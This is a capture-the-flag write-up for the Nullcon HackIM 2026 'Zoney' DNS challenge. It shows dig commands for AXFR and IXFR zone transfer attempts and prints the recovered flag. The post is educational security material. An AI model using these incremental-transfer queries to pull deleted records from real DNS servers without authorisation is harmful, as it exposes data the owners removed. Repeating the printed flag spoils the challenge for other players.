mis4nthr0pia

Nullcon HackIM CTF Goa 2026 – Zoney

Category: Misc (DNS / Recon)

Difficulty: Medium

1. Challenge Overview

The challenge provided a DNS server at 52.59.124.14:5054 for the domain flag.ctf.nullcon.net. The author hinted that the flag was hidden and challenged me to “show that I know all about DNS.”

2. Vulnerability Analysis

Step 1: Initial Reconnaissance

I started by checking for the flag in standard TXT records at the apex.

dig @52.59.124.14 -p 5054 TXT flag.ctf.nullcon.net

Result: flag.ctf.nullcon.net. 300 IN TXT "The flag was removed."

The server claimed the flag was gone, but the presence of a custom message suggested it might still be accessible through advanced DNS features.

Step 2: Failed Enumeration Attempts

I attempted several standard DNS exploitation techniques, all of which were unsuccessful:

  • Zone Transfer (AXFR): dig @52.59.124.14 -p 5054 AXFR flag.ctf.nullcon.net — Result: ; Transfer failed.
  • DNSSEC Walking: Querying for non-existent records with +dnssec did not return NSEC records, meaning the zone wasn’t “walkable” like the previous challenge.
  • Chaos Class (CH): Querying CH TXT flag.ctf.nullcon.net returned the same “flag was removed” message.
  • EDNS Client Subnet: Testing with +subnet=127.0.0.1 and other subnets did not change the output.

Step 3: Investigating Zone History (IXFR)

I checked the SOA (Start of Authority) record to see the serial number:

dig @52.59.124.14 -p 5054 SOA flag.ctf.nullcon.net

Result: Serial was 1500.

This indicated the zone had undergone many updates. I tested an Incremental Zone Transfer (IXFR) to see the changes between version 1499 and 1500:

dig @52.59.124.14 -p 5054 IXFR=1499 flag.ctf.nullcon.net

Discovery: The response showed the admin explicitly removing a record:

flag.ctf.nullcon.net. 300 IN TXT "Phew, removed the flag before anyone could get it"

3. Developing the Exploit

Since the flag was “removed” in version 1499, it had to exist in an earlier version. In CTF environments, specific “leet” numbers are often used for significant updates. I targeted serial 1337 to see the state of the zone at that specific point in history.

4. The Solution Script (Manual Command)

The winning command requested the incremental changes starting from version 1337.

dig @52.59.124.14 -p 5054 IXFR=1337 flag.ctf.nullcon.net

5. The Winning Payload

The server responded with the diff starting from serial 1337, revealing the original record:

flag.ctf.nullcon.net. 300 IN SOA ns.ctf.nullcon.net. admin.ctf.nullcon.net. 1337 3600 1800 604800 86400
flag.ctf.nullcon.net. 300 IN A 10.13.37.1
flag.ctf.nullcon.net. 300 IN TXT "Update #1337: ENO{1337_1ncr3m3nt4l_z0n3_tr4nsf3r_m4st3r_8f9a2c1d}"

6. Result

  • Flag: ENO{1337_1ncr3m3nt4l_z0n3_tr4nsf3r_m4st3r_8f9a2c1d}
  • Lessons Learned: DNS servers often maintain a history of zone updates. If a record is deleted, it may still be retrievable using IXFR if the attacker can guess or brute-force the serial number of a previous version.
Posted in:

Leave a Reply

Your email address will not be published. Required fields are marked *